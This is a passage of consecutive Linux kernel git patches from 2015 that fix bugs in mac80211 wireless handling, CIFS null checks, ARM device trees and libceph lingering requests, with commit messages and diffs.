-136,6 +136,11 @@ static int wiphy_resume(struct device *dev) return ret; } + +static SIMPLE_DEV_PM_OPS(wiphy_pm_ops, wiphy_suspend, wiphy_resume); +#define WIPHY_PM_OPS (&wiphy_pm_ops) +#else +#define WIPHY_PM_OPS NULL #endif static const void *wiphy_namespace(struct device *d) @@ -151,10 +156,7 @@ struct class ieee80211_class = { .dev_release = wiphy_dev_release, .dev_groups = ieee80211_groups, .dev_uevent = wiphy_uevent, -#ifdef CONFIG_PM - .suspend = wiphy_suspend, - .resume = wiphy_resume, -#endif + .pm = WIPHY_PM_OPS, .ns_type = &net_ns_type_operations, .namespace = wiphy_namespace, }; From f8bdbb584749420da1a7fea8cc1df18e5c2c4d6c Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Wed, 20 May 2015 15:04:53 +0200 Subject: [PATCH 126/872] mac80211: add missing drv_priv description for TXQ struct The kernel-doc description for the drv_priv member of struct ieee80211_txq was missing, leading to errors. Add a suitable description to fix that. Signed-off-by: Johannes Berg --- include/net/mac80211.h | 1 + 1 file changed, 1 insertion(+) diff --git a/include/net/mac80211.h b/include/net/mac80211.h index 67e0df14ba0f..887fe95b9805 100644 --- a/include/net/mac80211.h +++ b/include/net/mac80211.h @@ -1728,6 +1728,7 @@ struct ieee80211_tx_control { * @sta: station table entry, %NULL for per-vif queue * @tid: the TID for this queue (unused for per-vif queue) * @ac: the AC for this queue + * @drv_priv: driver private area, sized by hw->txq_data_size * * The driver can obtain packets from this queue by calling * ieee80211_tx_dequeue(). From 464daaf04cb633ae1530652fd23cdea0f0d21dd5 Mon Sep 17 00:00:00 2001 From: Michal Kazior Date: Tue, 19 May 2015 14:13:36 +0200 Subject: [PATCH 127/872] mac80211: check fast-xmit on station change Drivers with fast-xmit (e.g. ath10k) running in AP_VLAN setups would fail to communicate with connected 4addr stations. The reason was when new station associates it first goes into master AP interface. It is not until later that a dedicated AP_VLAN is created for it and the station itself is moved there. After that Tx directed at the station should use 4addr header. However fast-xmit wasn't recalculated and 3addr header remained to be used. This in turn caused the connected 4addr stations to drop packets coming from the AP until some other event would cause fast-xmit to recalculate for that station (which could never come). Signed-off-by: Michal Kazior Signed-off-by: Johannes Berg --- net/mac80211/cfg.c | 1 + 1 file changed, 1 insertion(+) diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c index 3469bbdc891c..bb9f83640b46 100644 --- a/net/mac80211/cfg.c +++ b/net/mac80211/cfg.c @@ -1411,6 +1411,7 @@ static int ieee80211_change_station(struct wiphy *wiphy, } sta->sdata = vlansdata; + ieee80211_check_fast_xmit(sta); if (sta->sta_state == IEEE80211_STA_AUTHORIZED && prev_4addr != new_4addr) { From 252ec2b3aa6f6a9ac29c6539027db600c11bf45e Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Tue, 19 May 2015 13:36:38 +0200 Subject: [PATCH 128/872] mac80211: don't split remain-on-channel for coalescing Due to remain-on-channel scheduling delays, when we split an ROC while coalescing, we'll usually get a picture like this: existing ROC: |------------------| current time: ^ new ROC: |------| |-------| If the expected response frames are then transmitted by the peer in the hole between the two fragments of the new ROC, we miss them and the process (e.g. ANQP query) fails. mac80211 expects that the window to miss something is small: existing ROC: |------------------| new ROC: |------||-------| but that's normally not the case. To avoid this problem, coalesce only if the new ROC's duration is <= the remaining time on the existing one: existing ROC: |------------------| new ROC: |-----| and never split a new one but schedule it afterwards instead: existing ROC: |------------------| new ROC: |-------------| type=bugfix bug=not-tracked fixes=unknown Reported-by: Matti Gottlieb Reviewed-by: EliadX Peller Reviewed-by: Matti Gottlieb Tested-by: Matti Gottlieb Signed-off-by: Johannes Berg --- net/mac80211/cfg.c | 59 +++++++------------------------------- net/mac80211/ieee80211_i.h | 6 ---- 2 files changed, 11 insertions(+), 54 deletions(-) diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c index 265e42721a66..ff347a0eebd4 100644 --- a/net/mac80211/cfg.c +++ b/net/mac80211/cfg.c @@ -2495,51 +2495,22 @@ static bool ieee80211_coalesce_started_roc(struct ieee80211_local *local, struct ieee80211_roc_work *new_roc, struct ieee80211_roc_work *cur_roc) { - unsigned long j = jiffies; - unsigned long cur_roc_end = cur_roc->hw_start_time + - msecs_to_jiffies(cur_roc->duration); - struct ieee80211_roc_work *next_roc; - int new_dur; + unsigned long now = jiffies; + unsigned long remaining = cur_roc->hw_start_time + + msecs_to_jiffies(cur_roc->duration) - + now; if (WARN_ON(!cur_roc->started || !cur_roc->hw_begun)) return false; - if (time_after(j + IEEE80211_ROC_MIN_LEFT, cur_roc_end)) + /* if it doesn't fit entirely, schedule a new one */ + if (new_roc->duration > jiffies_to_msecs(remaining)) return false; ieee80211_handle_roc_started(new_roc); - new_dur = new_roc->duration - jiffies_to_msecs(cur_roc_end - j); - - /* cur_roc is long enough - add new_roc to the dependents list. */ - if (new_dur <= 0) { - list_add_tail(&new_roc->list, &cur_roc->dependents); - return true; - } - - new_roc->duration = new_dur; - - /* - * if cur_roc was already coalesced before, we might - * want to extend the next roc instead of adding - * a new one. - */ - next_roc = list_entry(cur_roc->list.next, - struct ieee80211_roc_work, list); - if (&next_roc->list != &local->roc_list && - next_roc->chan == new_roc->chan && - next_roc->sdata == new_roc->sdata && - !WARN_ON(next_roc->started)) { - list_add_tail(&new_roc->list, &next_roc->dependents); - next_roc->duration = max(next_roc->duration, - new_roc->duration); - next_roc->type = max(next_roc->type, new_roc->type); - return true; - } - - /* add right after cur_roc */ - list_add(&new_roc->list, &cur_roc->list); - + /* add to dependents so we send the expired event properly */ + list_add_tail(&new_roc->list, &cur_roc->dependents); return true; } @@ -2652,17 +2623,9 @@ static int ieee80211_start_roc_work(struct ieee80211_local *local, * In the offloaded ROC case, if it hasn't begun, add * this new one to the dependent list to be handled * when the master one begins. If it has begun, - * check that there's still a minimum time left and - * if so, start this one, transmitting the frame, but - * add it to the list directly after this one with - * a reduced time so we'll ask the driver to execute - * it right after finishing the previous one, in the - * hope that it'll also be executed right afterwards, - * effectively extending the old one. - * If there's no minimum time left, just add it to the - * normal list. - * TODO: the ROC type is ignored here, assuming that it - * is better to immediately use the current ROC. + * check if it fits entirely within the existing one, + * in which case it will just be dependent as well. + * Otherwise, schedule it by itself. */ if (!tmp->hw_begun) { list_add_tail(&roc->list, &tmp->dependents); diff --git a/net/mac80211/ieee80211_i.h b/net/mac80211/ieee80211_i.h index cdc374296245..c0a9187bc3a9 100644 --- a/net/mac80211/ieee80211_i.h +++ b/net/mac80211/ieee80211_i.h @@ -328,12 +328,6 @@ struct mesh_preq_queue { u8 flags; }; -#if HZ/100 == 0 -#define IEEE80211_ROC_MIN_LEFT 1 -#else -#define IEEE80211_ROC_MIN_LEFT (HZ/100) -#endif - struct ieee80211_roc_work { struct list_head list; struct list_head dependents; From f9dca80b98caac8b4bfb43a2edf1e9f877ccf322 Mon Sep 17 00:00:00 2001 From: Michal Kazior Date: Wed, 13 May 2015 09:16:48 +0000 Subject: [PATCH 129/872] mac80211: fix AP_VLAN crypto tailroom calculation Some splats I was seeing: (a) WARNING: CPU: 1 PID: 0 at /devel/src/linux/net/mac80211/wep.c:102 ieee80211_wep_add_iv (b) WARNING: CPU: 1 PID: 0 at /devel/src/linux/net/mac80211/wpa.c:73 ieee80211_tx_h_michael_mic_add (c) WARNING: CPU: 3 PID: 0 at /devel/src/linux/net/mac80211/wpa.c:433 ieee80211_crypto_ccmp_encrypt I've seen (a) and (b) with ath9k hw crypto and (c) with ath9k sw crypto. All of them were related to insufficient skb tailroom and I was able to trigger these with ping6 program. AP_VLANs may inherit crypto keys from parent AP. This wasn't considered and yielded problems in some setups resulting in inability to transmit data because mac80211 wouldn't resize skbs when necessary and subsequently drop some packets due to insufficient tailroom. For efficiency purposes don't inspect both AP_VLAN and AP sdata looking for tailroom counter. Instead update AP_VLAN tailroom counters whenever their master AP tailroom counter changes. Signed-off-by: Michal Kazior Signed-off-by: Johannes Berg --- net/mac80211/iface.c | 6 ++++ net/mac80211/key.c | 82 +++++++++++++++++++++++++++++++++++++++----- net/mac80211/key.h | 1 + net/mac80211/util.c | 3 ++ 4 files changed, 83 insertions(+), 9 deletions(-) diff --git a/net/mac80211/iface.c b/net/mac80211/iface.c index bab5c63c0bad..84cef600c573 100644 --- a/net/mac80211/iface.c +++ b/net/mac80211/iface.c @@ -522,6 +522,12 @@ int ieee80211_do_open(struct wireless_dev *wdev, bool coming_up) memcpy(sdata->vif.hw_queue, master->vif.hw_queue, sizeof(sdata->vif.hw_queue)); sdata->vif.bss_conf.chandef = master->vif.bss_conf.chandef; + + mutex_lock(&local->key_mtx); + sdata->crypto_tx_tailroom_needed_cnt += + master->crypto_tx_tailroom_needed_cnt; + mutex_unlock(&local->key_mtx); + break; } case NL80211_IFTYPE_AP: diff --git a/net/mac80211/key.c b/net/mac80211/key.c index 2291cd730091..a907f2d5c12d 100644 --- a/net/mac80211/key.c +++ b/net/mac80211/key.c @@ -58,6 +58,22 @@ static void assert_key_lock(struct ieee80211_local *local) lockdep_assert_held(&local->key_mtx); } +static void +update_vlan_tailroom_need_count(struct ieee80211_sub_if_data *sdata, int delta) +{ + struct ieee80211_sub_if_data *vlan; + + if (sdata->vif.type != NL80211_IFTYPE_AP) + return; + + mutex_lock(&sdata->local->mtx); + + list_for_each_entry(vlan, &sdata->u.ap.vlans, u.vlan.list) + vlan->crypto_tx_tailroom_needed_cnt += delta; + + mutex_unlock(&sdata->local->mtx); +} + static void increment_tailroom_need_count(struct ieee80211_sub_if_data *sdata) { /* @@ -79,6 +95,8 @@ static void increment_tailroom_need_count(struct ieee80211_sub_if_data *sdata) * http://mid.gmane.org/1308590980.4322.19.camel@jlt3.sipsolutions.net */ + update_vlan_tailroom_need_count(sdata, 1); + if (!sdata->crypto_tx_tailroom_needed_cnt++) { /* * Flush all XMIT packets currently using HW encryption or no @@ -88,6 +106,15 @@ static void increment_tailroom_need_count(struct ieee80211_sub_if_data *sdata) } } +static void decrease_tailroom_need_count(struct ieee80211_sub_if_data *sdata, + int delta) +{ + WARN_ON_ONCE(sdata->crypto_tx_tailroom_needed_cnt < delta); + + update_vlan_tailroom_need_count(sdata, -delta); + sdata->crypto_tx_tailroom_needed_cnt -= delta; +} + static int ieee80211_key_enable_hw_accel(struct ieee80211_key *key) { struct ieee80211_sub_if_data *sdata; @@ -144,7 +171,7 @@ static int ieee80211_key_enable_hw_accel(struct ieee80211_key *key) if (!((key->conf.flags & IEEE80211_KEY_FLAG_GENERATE_MMIC) || (key->conf.flags & IEEE80211_KEY_FLAG_RESERVE_TAILROOM))) - sdata->crypto_tx_tailroom_needed_cnt--; + decrease_tailroom_need_count(sdata, 1); WARN_ON((key->conf.flags & IEEE80211_KEY_FLAG_PUT_IV_SPACE) && (key->conf.flags & IEEE80211_KEY_FLAG_GENERATE_IV)); @@ -541,7 +568,7 @@ static void __ieee80211_key_destroy(struct ieee80211_key *key, schedule_delayed_work(&sdata->dec_tailroom_needed_wk, HZ/2); } else { - sdata->crypto_tx_tailroom_needed_cnt--; + decrease_tailroom_need_count(sdata, 1); } } @@ -631,6 +658,7 @@ void ieee80211_key_free(struct ieee80211_key *key, bool delay_tailroom) void ieee80211_enable_keys(struct ieee80211_sub_if_data *sdata) { struct ieee80211_key *key; + struct ieee80211_sub_if_data *vlan; ASSERT_RTNL(); @@ -639,7 +667,14 @@ void ieee80211_enable_keys(struct ieee80211_sub_if_data *sdata) mutex_lock(&sdata->local->key_mtx); - sdata->crypto_tx_tailroom_needed_cnt = 0; + WARN_ON_ONCE(sdata->crypto_tx_tailroom_needed_cnt || + sdata->crypto_tx_tailroom_pending_dec); + + if (sdata->vif.type == NL80211_IFTYPE_AP) { + list_for_each_entry(vlan, &sdata->u.ap.vlans, u.vlan.list) + WARN_ON_ONCE(vlan->crypto_tx_tailroom_needed_cnt || + vlan->crypto_tx_tailroom_pending_dec); + } list_for_each_entry(key, &sdata->key_list, list) { increment_tailroom_need_count(sdata); @@ -649,6 +684,22 @@ void ieee80211_enable_keys(struct ieee80211_sub_if_data *sdata) mutex_unlock(&sdata->local->key_mtx); } +void ieee80211_reset_crypto_tx_tailroom(struct ieee80211_sub_if_data *sdata) +{ + struct ieee80211_sub_if_data *vlan; + + mutex_lock(&sdata->local->key_mtx); + + sdata->crypto_tx_tailroom_needed_cnt = 0; + + if (sdata->vif.type == NL80211_IFTYPE_AP) { + list_for_each_entry(vlan, &sdata->u.ap.vlans, u.vlan.list) + vlan->crypto_tx_tailroom_needed_cnt = 0; + } + + mutex_unlock(&sdata->local->key_mtx); +} + void ieee80211_iter_keys(struct ieee80211_hw *hw, struct ieee80211_vif *vif, void (*iter)(struct ieee80211_hw *hw, @@ -688,8 +739,8 @@ static void ieee80211_free_keys_iface(struct ieee80211_sub_if_data *sdata, { struct ieee80211_key *key, *tmp; - sdata->crypto_tx_tailroom_needed_cnt -= - sdata->crypto_tx_tailroom_pending_dec; + decrease_tailroom_need_count(sdata, + sdata->crypto_tx_tailroom_pending_dec); sdata->crypto_tx_tailroom_pending_dec = 0; ieee80211_debugfs_key_remove_mgmt_default(sdata); @@ -709,6 +760,7 @@ void ieee80211_free_keys(struct ieee80211_sub_if_data *sdata, { struct ieee80211_local *local = sdata->local; struct ieee80211_sub_if_data *vlan; + struct ieee80211_sub_if_data *master; struct ieee80211_key *key, *tmp; LIST_HEAD(keys); @@ -728,8 +780,20 @@ void ieee80211_free_keys(struct ieee80211_sub_if_data *sdata, list_for_each_entry_safe(key, tmp, &keys, list) __ieee80211_key_destroy(key, false); - WARN_ON_ONCE(sdata->crypto_tx_tailroom_needed_cnt || - sdata->crypto_tx_tailroom_pending_dec); + if (sdata->vif.type == NL80211_IFTYPE_AP_VLAN) { + if (sdata->bss) { + master = container_of(sdata->bss, + struct ieee80211_sub_if_data, + u.ap); + + WARN_ON_ONCE(sdata->crypto_tx_tailroom_needed_cnt != + master->crypto_tx_tailroom_needed_cnt); + } + } else { + WARN_ON_ONCE(sdata->crypto_tx_tailroom_needed_cnt || + sdata->crypto_tx_tailroom_pending_dec); + } + if (sdata->vif.type == NL80211_IFTYPE_AP) { list_for_each_entry(vlan, &sdata->u.ap.vlans, u.vlan.list) WARN_ON_ONCE(vlan->crypto_tx_tailroom_needed_cnt || @@ -793,8 +857,8 @@ void ieee80211_delayed_tailroom_dec(struct work_struct *wk) */ mutex_lock(&sdata->local->key_mtx); - sdata->crypto_tx_tailroom_needed_cnt -= - sdata->crypto_tx_tailroom_pending_dec; + decrease_tailroom_need_count(sdata, + sdata->crypto_tx_tailroom_pending_dec); sdata->crypto_tx_tailroom_pending_dec = 0; mutex_unlock(&sdata->local->key_mtx); } diff --git a/net/mac80211/key.h b/net/mac80211/key.h index c5a31835be0e..96557dd1e77d 100644 --- a/net/mac80211/key.h +++ b/net/mac80211/key.h @@ -161,6 +161,7 @@ void ieee80211_free_keys(struct ieee80211_sub_if_data *sdata, void ieee80211_free_sta_keys(struct ieee80211_local *local, struct sta_info *sta); void ieee80211_enable_keys(struct ieee80211_sub_if_data *sdata); +void ieee80211_reset_crypto_tx_tailroom(struct ieee80211_sub_if_data *sdata); #define key_mtx_dereference(local, ref) \ rcu_dereference_protected(ref, lockdep_is_held(&((local)->key_mtx))) diff --git a/net/mac80211/util.c b/net/mac80211/util.c index 79412f16b61d..b864ebc6ab8f 100644 --- a/net/mac80211/util.c +++ b/net/mac80211/util.c @@ -2022,6 +2022,9 @@ int ieee80211_reconfig(struct ieee80211_local *local) mutex_unlock(&local->sta_mtx); /* add back keys */ + list_for_each_entry(sdata, &local->interfaces, list) + ieee80211_reset_crypto_tx_tailroom(sdata); + list_for_each_entry(sdata, &local->interfaces, list) if (ieee80211_sdata_running(sdata)) ieee80211_enable_keys(sdata); From c5a71688e1e56e155fb79b8d699322f4f0793cc8 Mon Sep 17 00:00:00 2001 From: Arik Nemtsov Date: Tue, 19 May 2015 14:36:48 +0300 Subject: [PATCH 130/872] mac80211: disconnect TDLS stations on STA CSA When a station does a channel switch, it's not well defined what its TDLS peers would do. Avoid a situation when the local side marks a potentially disconnected peer as a TDLS peer. Keeping peers connected through CSA is doubly problematic with the upcoming TDLS WIDER-BW feature which allows peers to widen the BSS channel. The new channel transitioned-to might not be compatible and would require a re-negotiation anyway. Make sure to disallow new TDLS link during CSA. Signed-off-by: Arik Nemtsov Signed-off-by: Emmanuel Grumbach Signed-off-by: Johannes Berg --- net/mac80211/mlme.c | 26 ++++++++++++++++++++++++++ net/mac80211/tdls.c | 6 ++++++ 2 files changed, 32 insertions(+) diff --git a/net/mac80211/mlme.c b/net/mac80211/mlme.c index 3294666f599c..387fe70ab126 100644 --- a/net/mac80211/mlme.c +++ b/net/mac80211/mlme.c @@ -1098,6 +1098,24 @@ static void ieee80211_chswitch_timer(unsigned long data) ieee80211_queue_work(&sdata->local->hw, &sdata->u.mgd.chswitch_work); } +static void ieee80211_teardown_tdls_peers(struct ieee80211_sub_if_data *sdata) +{ + struct sta_info *sta; + u16 reason = WLAN_REASON_TDLS_TEARDOWN_UNSPECIFIED; + + rcu_read_lock(); + list_for_each_entry_rcu(sta, &sdata->local->sta_list, list) { + if (!sta->sta.tdls || sta->sdata != sdata || !sta->uploaded || + !test_sta_flag(sta, WLAN_STA_AUTHORIZED)) + continue; + + ieee80211_tdls_oper_request(&sdata->vif, sta->sta.addr, + NL80211_TDLS_TEARDOWN, reason, + GFP_ATOMIC); + } + rcu_read_unlock(); +} + static void ieee80211_sta_process_chanswitch(struct ieee80211_sub_if_data *sdata, u64 timestamp, u32 device_timestamp, @@ -1161,6 +1179,14 @@ ieee80211_sta_process_chanswitch(struct ieee80211_sub_if_data *sdata, return; } + /* + * Drop all TDLS peers - either we disconnect or move to a different + * channel from this point on. There's no telling what our peer will do. + * The TDLS WIDER_BW scenario is also problematic, as peers might now + * have an incompatible wider chandef. + */ + ieee80211_teardown_tdls_peers(sdata); + mutex_lock(&local->mtx); mutex_lock(&local->chanctx_mtx); conf = rcu_dereference_protected(sdata->vif.chanctx_conf, diff --git a/net/mac80211/tdls.c b/net/mac80211/tdls.c index 8a92a920ff17..75e8e3bba538 100644 --- a/net/mac80211/tdls.c +++ b/net/mac80211/tdls.c @@ -1183,6 +1183,12 @@ int ieee80211_tdls_oper(struct wiphy *wiphy, struct net_device *dev, switch (oper) { case NL80211_TDLS_ENABLE_LINK: + if (sdata->vif.csa_active) { + tdls_dbg(sdata, "TDLS: disallow link during CSA\n"); + ret = -EBUSY; + break; + } + rcu_read_lock(); sta = sta_info_get(sdata, peer); if (!sta) { From c411ead995b46f361b92116fd042ae83866044a1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Rafa=C5=82=20Mi=C5=82ecki?= Date: Wed, 13 May 2015 07:36:38 +0200 Subject: [PATCH 131/872] ssb: extend fix for PCI related silent reboots to all chipsets MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Recent fix for BCM4704 reboots has to be extended as the same problem affects Linksys WRT350N v1 (BCM4705). Signed-off-by: Rafał Miłecki Reported-by: Daniel Gimpelevich Signed-off-by: Kalle Valo --- drivers/ssb/driver_pcicore.c | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/drivers/ssb/driver_pcicore.c b/drivers/ssb/driver_pcicore.c index 15a7ee3859dd..5fe1c22e289b 100644 --- a/drivers/ssb/driver_pcicore.c +++ b/drivers/ssb/driver_pcicore.c @@ -359,12 +359,13 @@ static void ssb_pcicore_init_hostmode(struct ssb_pcicore *pc) /* * Accessing PCI config without a proper delay after devices reset (not - * GPIO reset) was causing reboots on WRT300N v1.0. + * GPIO reset) was causing reboots on WRT300N v1.0 (BCM4704). * Tested delay 850 us lowered reboot chance to 50-80%, 1000 us fixed it * completely. Flushing all writes was also tested but with no luck. + * The same problem was reported for WRT350N v1 (BCM4705), so we just + * sleep here unconditionally. */ - if (pc->dev->bus->chip_id == 0x4704) - usleep_range(1000, 2000); + usleep_range(1000, 2000); /* Enable PCI bridge BAR0 prefetch and burst */ val = PCI_COMMAND_MASTER | PCI_COMMAND_MEMORY; From 1dc92c450a53f120b67296cb4b29c1dfdc665ac1 Mon Sep 17 00:00:00 2001 From: Steve French Date: Wed, 20 May 2015 09:32:21 -0500 Subject: [PATCH 132/872] [cifs] fix null pointer check Dan Carpenter pointed out an inconsistent null pointer check in smb2_hdr_assemble that was pointed out by static checker. Signed-off-by: Steve French Reviewed-by: Sachin Prabhu CC: Dan Carpenter w --- fs/cifs/smb2pdu.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c index 65cd7a84c8bc..54cbe19d9c08 100644 --- a/fs/cifs/smb2pdu.c +++ b/fs/cifs/smb2pdu.c @@ -110,7 +110,7 @@ smb2_hdr_assemble(struct smb2_hdr *hdr, __le16 smb2_cmd /* command */ , /* GLOBAL_CAP_LARGE_MTU will only be set if dialect > SMB2.02 */ /* See sections 2.2.4 and 3.2.4.1.5 of MS-SMB2 */ - if ((tcon->ses) && + if ((tcon->ses) && (tcon->ses->server) && (tcon->ses->server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU)) hdr->CreditCharge = cpu_to_le16(1); /* else CreditCharge MBZ */ From 65c3b205ebe06a389a29544e71a8071da0ce4155 Mon Sep 17 00:00:00 2001 From: Dan Carpenter Date: Thu, 30 Apr 2015 17:30:24 +0300 Subject: [PATCH 133/872] CIFS: remove an unneeded NULL check Smatch complains because we dereference "ses->server" without checking some lines earlier inside the call to get_next_mid(ses->server). fs/cifs/cifssmb.c:4921 CIFSGetDFSRefer() warn: variable dereferenced before check 'ses->server' (see line 4899) There is only one caller for this function get_dfs_path() and it always passes a non-null "ses->server" pointer so this NULL check can be removed. Signed-off-by: Dan Carpenter Signed-off-by: Steve French --- fs/cifs/cifssmb.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fs/cifs/cifssmb.c b/fs/cifs/cifssmb.c index 1091affba425..f26ffbfc64d8 100644 --- a/fs/cifs/cifssmb.c +++ b/fs/cifs/cifssmb.c @@ -4918,7 +4918,7 @@ CIFSGetDFSRefer(const unsigned int xid, struct cifs_ses *ses, strncpy(pSMB->RequestFileName, search_name, name_len); } - if (ses->server && ses->server->sign) + if (ses->server->sign) pSMB->hdr.Flags2 |= SMBFLG2_SECURITY_SIGNATURE; pSMB->hdr.Uid = ses->Suid; From 3d76be5b933e2a66d85a2f7444e68e99e8a48ad4 Mon Sep 17 00:00:00 2001 From: Robert Nelson Date: Wed, 20 May 2015 10:00:10 -0700 Subject: [PATCH 134/872] ARM: dts: am335x-boneblack: disable RTC-only sleep Fixes: http://bugs.elinux.org/issues/143 Entering RTC-only sleep is only properly supported on early prototypes series (pre-A6) of the BeagleBone Black. Since rev (A6A), which include all production versions, it is not support at due to. (rev A6) enable of the 3v3b regulator moved from LDO2 to LDO4 (3v3a) side-effect: 3v3b rail remains on in sleep-mode (also in off-mode when battery-powered) (rev A6A) am335x vdds supply moved from LDO3 to LDO1 side-effect: vdds remains supplied in sleep-mode Reported-by: Matthijs van Duin Tested-by: Matthijs van Duin Signed-off-by: Robert Nelson Cc: Tony Lindgren Cc: Felipe Balbi Cc: Johan Hovold Signed-off-by: Tony Lindgren --- arch/arm/boot/dts/am335x-boneblack.dts | 4 ---- 1 file changed, 4 deletions(-) diff --git a/arch/arm/boot/dts/am335x-boneblack.dts b/arch/arm/boot/dts/am335x-boneblack.dts index 5c42d259fa68..901739fcb85a 100644 --- a/arch/arm/boot/dts/am335x-boneblack.dts +++ b/arch/arm/boot/dts/am335x-boneblack.dts @@ -80,7 +80,3 @@ status = "okay"; }; }; - -&rtc { - system-power-controller; -}; From ed38c6573b2ef34b3629989f7b6ac5894a010403 Mon Sep 17 00:00:00 2001 From: Anthoine Bourgeois Date: Wed, 20 May 2015 10:00:10 -0700 Subject: [PATCH 135/872] ARM: dts: omap3-devkit8000: Fix NAND DT node Add nand-ecc-opt and device-width properties to enable nand support on Devkit8000. Signed-off-by: Anthoine Bourgeois Signed-off-by: Tony Lindgren --- arch/arm/boot/dts/omap3-devkit8000.dts | 2 ++ 1 file changed, 2 insertions(+) diff --git a/arch/arm/boot/dts/omap3-devkit8000.dts b/arch/arm/boot/dts/omap3-devkit8000.dts index 134d3f27a8ec..921de6605f07 100644 --- a/arch/arm/boot/dts/omap3-devkit8000.dts +++ b/arch/arm/boot/dts/omap3-devkit8000.dts @@ -110,6 +110,8 @@ nand@0,0 { reg = <0 0 4>; /* CS0, offset 0, IO size 4 */ nand-bus-width = <16>; + gpmc,device-width = <2>; + ti,nand-ecc-opt = "sw"; gpmc,sync-clk-ps = <0>; gpmc,cs-on-ns = <0>; From f25bf74c8862efdc30453d16d60cf22958a4873e Mon Sep 17 00:00:00 2001 From: Romain Izard Date: Wed, 20 May 2015 10:00:10 -0700 Subject: [PATCH 136/872] ARM: dts: Fix WLAN interrupt line for AM335x EVM-SK While Sitara AM335x SoCs are very close to OMAP SoCs, the 32-line GPIO controllers are numbered from 0 on AM335x and from 1 on OMAP. But when the configuration for the TI WLAN controllers was converted from platform data to device tree, this detail was overlooked, as 10 boards were using OMAP with the WL12xx and WL18xx controllers, and only one was based on AM335x. This invalid configuration prevents the WL1271 module on the AM335x EVM-SK from notifying interrupts to the SoC, and breaks the wlan driver. The DTS must be corrected to use the correct GPIO controller. Signed-off-by: Romain Izard Signed-off-by: Tony Lindgren --- arch/arm/boot/dts/am335x-evmsk.dts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/arm/boot/dts/am335x-evmsk.dts b/arch/arm/boot/dts/am335x-evmsk.dts index 87fc7a35e802..156d05efcb70 100644 --- a/arch/arm/boot/dts/am335x-evmsk.dts +++ b/arch/arm/boot/dts/am335x-evmsk.dts @@ -654,7 +654,7 @@ wlcore: wlcore@2 { compatible = "ti,wl1271"; reg = <2>; - interrupt-parent = <&gpio1>; + interrupt-parent = <&gpio0>; interrupts = <31 IRQ_TYPE_LEVEL_HIGH>; /* gpio 31 */ ref-clock-frequency = <38400000>; }; From b0494532214bdfbf241e94fabab5dd46f7b82631 Mon Sep 17 00:00:00 2001 From: Ilya Dryomov Date: Mon, 11 May 2015 17:53:10 +0300 Subject: [PATCH 137/872] libceph: request a new osdmap if lingering request maps to no osd This commit does two things. First, if there are any homeless lingering requests, we now request a new osdmap even if the osdmap that is being processed brought no changes, i.e. if a given lingering request turned homeless in one of the previous epochs and remained homeless in the current epoch. Not doing so leaves us with a stale osdmap and as a result we may miss our window for reestablishing the watch and lose notifies. MON=1 OSD=1: # cat linger-needmap.sh #!/bin/bash rbd create --size 1 test DEV=$(rbd map test) ceph osd out 0 rbd map dne/dne # obtain a new osdmap as a side effect (!) sleep 1 ceph osd in 0 rbd resize --size 2 test # rbd info test | grep size -> 2M # blockdev --getsize $DEV -> 1M N.B.: Not obtaining a new osdmap in between "osd out" and "osd in" above is enough to make it miss that resize notify, but that is a bug^Wlimitation of ceph watch/notify v1. Second, homeless lingering requests are now kicked just like those lingering requests whose mapping has changed. This is mainly to recognize that a homeless lingering request makes no sense and to preserve the invariant that a registered lingering request is not sitting on any of r_req_lru_item lists. This spares us a WARN_ON, which commit ba9d114ec557 ("libceph: clear r_req_lru_item in __unregister_linger_request()") tried to fix the _wrong_ way. Cc: stable@vger.kernel.org # 3.10+ Signed-off-by: Ilya Dryomov Reviewed-by: Sage Weil --- net/ceph/osd_client.c | 31 ++++++++++++++++++++----------- 1 file changed, 20 insertions(+), 11 deletions(-) diff --git a/net/ceph/osd_client.c b/net/ceph/osd_client.c index 41a4abc7e98e..31d4b1ebff01 100644 --- a/net/ceph/osd_client.c +++ b/net/ceph/osd_client.c @@ -2017,20 +2017,29 @@ static void kick_requests(struct ceph_osd_client *osdc, bool force_resend, err = __map_request(osdc, req, force_resend || force_resend_writes); dout("__map_request returned %d\n", err); - if (err == 0) - continue; /* no change and no osd was specified */ if (err < 0) continue; /* hrm! */ - if (req->r_osd == NULL) { - dout("tid %llu maps to no valid osd\n", req->r_tid); - needmap++; /* request a newer map */ - continue; - } + if (req->r_osd == NULL || err > 0) { + if (req->r_osd == NULL) { + dout("lingering %p tid %llu maps to no osd\n", + req, req->r_tid); + /* + * A homeless lingering request makes + * no sense, as it's job is to keep + * a particular OSD connection open. + * Request a newer map and kick the + * request, knowing that it won't be + * resent until we actually get a map + * that can tell us where to send it. + */ + needmap++; + } - dout("kicking lingering %p tid %llu osd%d\n", req, req->r_tid, - req->r_osd ? req->r_osd->o_osd : -1); - __register_request(osdc, req); - __unregister_linger_request(osdc, req); + dout("kicking lingering %p tid %llu osd%d\n", req, + req->r_tid, req->r_osd ? req->r_osd->o_osd : -1); + __register_request(osdc, req); + __unregister_linger_request(osdc, req); + } } reset_changed_osds(osdc); mutex_unlock(&osdc->request_mutex); From 521a04d06a729e5971cdee7f84080387ed320527 Mon Sep 17 00:00:00 2001 From: Ilya Dryomov Date: Mon, 11 May 2015 17:53:34 +0300 Subject: [PATCH 138/872] Revert "libceph: clear r_req_lru_item in __unregister_linger_request()" This reverts commit ba9d114ec5578e6e99a4dfa37ff8ae688040fd64. .. which introduced a regression that prevented all lingering requests requeued in kick_requests() from ever being sent to the OSDs, resulting in a lot of missed notifies. In retrospect it's pretty obvious that r_req_lru_item item in the case of lingering requests can be used not only for notarget, but also for unsent linkage due to how tightly actual map and enqueue operations are coupled in __map_request(). The assertion that was being silenced is taken care of in the previous ("libceph: request a new osdmap if lingering request maps to no osd") commit: by always kicking homeless lingering requests we ensure that none of them ends up on the notarget list outside of the critical section guarded by request_mutex. Cc: stable@vger.kernel.org # 3.18+, needs b0494532214b "libceph: request a new 